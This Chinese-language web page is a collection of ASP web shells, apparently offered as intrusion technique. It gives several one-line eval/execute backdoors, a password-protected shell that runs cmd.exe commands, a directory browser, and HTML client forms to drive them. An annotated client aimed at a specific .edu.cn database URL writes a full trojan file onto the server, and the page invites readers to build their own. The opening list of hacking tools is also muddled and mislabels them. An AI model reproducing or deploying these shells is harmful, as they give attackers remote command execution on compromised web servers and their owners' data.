ASP常用一句话木马列表
ASP常用的一句话木马大全包括: 1. 冰河木马:一种远程控制软件,可以监控被感染计算机的屏幕、键盘和文件。 2. 中国菜刀:一种网站渗透工具,可以对网站进行SQL注入、XSS跨站脚本攻击等。 3. 啊D注入工具:一种SQL注入工具,可以检测网站是否存在SQL注入漏洞。 4. NBSI上传漏洞检测:一种检测网站是否存在上传漏洞的工具。 5. 网络刺客II:一种远程控制软件,可以监控被感染计算机的屏幕、键盘和文件。
【入侵技术】 ASP一句话木马大全
<%evalrequest("MH")%><%executerequest("MH")%><%execute(request("MH"))%><%IfRequest("MH")<>""ThenExecute(Request("MH"))%><%ifrequest("MH")<>""thensession("MH")=request("MH"):endif:ifsession("MH")<>""thenexecutesession("MH")%><SCRIPTlanguage=VBScriptrunat="server">executerequest("MH")</SCRIPT><%@PageLanguage="Jscript"%><%eval_r(Request.Item["MH"],"unsafe");%>1asp一句话木马
一句话木马 服务器端
带验证:
cmd.asp
<%ifrequest("authkey")="pic16f873a"then%><textareareadonlycols=80rows=25><%response.writeserver.createobject("wscript.shell").exec("cmd.exe/c"&request("cmd")).stdout.readall%></textarea><%endif%>带验证 客户端
cmd.html
<HTML><HEAD><metahttp-equiv="Content-Type"content="text/html;charset=gbk"></HEAD><divalign=center><FORMmethod=postname=frmtarget=_blank>Host:<inputtype=textname=actsize=65value="http://"><br><br>Cmd:<inputtype=textname=cmdsize=65value="cmd"><br><br><inputtype=hiddenname=authkeyvalue="pic16f873a"><Inputname=Sendonclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"type=buttonvalue="SendCommand"></FORM></div>
目录浏览
服务器端
<%ifrequest("authkey")="pic16f873a"thenszPara=Request.Form("path")setshell=server.createobject("shell.application")setdir1=shell.namespace(szPara)setdiritems=dir1.itemsforeachiiiindiritemsresponse.writeiii.path&"<fontcolor=blue>["&iii.size&"]</font><br>"nextendif%>客户端
<HTML><HEAD><metahttp-equiv="Content-Type"content="text/html;charset=gbk"></HEAD><divalign=center><FORMmethod=postname=frmtarget=_blank>Host:<inputtype=textname=actsize=65value="http://"><br><br>Path:<inputtype=textname=pathsize=65value="C:"><br><br><inputtype=hiddenname=authkeyvalue="pic16f873a"><Inputname=Sendonclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"type=buttonvalue="SendCommand"></FORM></div>
一句话木马客户端源文件:
里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了
<formaction=http://cjy.xjife.edu.cn/news/ebook/db/ebook.aspmethod=post>//"action="后面是需要修改的以asp命名的数据库的提交地址//这个标签的意思是建立一个表单以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理<textareaname=valuecols=120rows=10width=45>//这里的value值根据服务端<%executerequest("value")%>中value而设定//可以自行修改成<%executerequest("p")%>相应这里的value值也必须改为psetlP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法lP.Open//打开lP.Type=2//以文本方式lP.CharSet="gb2312"//字体标准lP.writetextrequest("joeving")//取得木马内容参数joeving可以自己定义但必须和下面的name=joeving相对应lP.SaveToFileserver.mappath("wei.asp"),2//将木马内容以覆盖文件的方式写入wei.asp//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp//但和下面的response.redirect"wei.asp"中wei.asp的保持一致lP.Close//关闭对象setlP=nothing//释放对象response.redirect"wei.asp"//转向生成的wei.asp和上面的wei.asp相对应,也就是你熟悉的asp木马登陆界面</textarea>//这段程序的功能:利用插入到数据库文件的<%executerequest("value")%>这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了<textareaname=joevingcols=120rows=10width=45>添入生成木马的内容/textarea><BR><center><br>//这段标签是你用来添加木马内容用的<inputtype=submitvalue=提交></form>程序的主要框架是
<form><textarea></textarea>//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示<textarea></textarea>//添加木马内容用的</form>
其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~哈哈
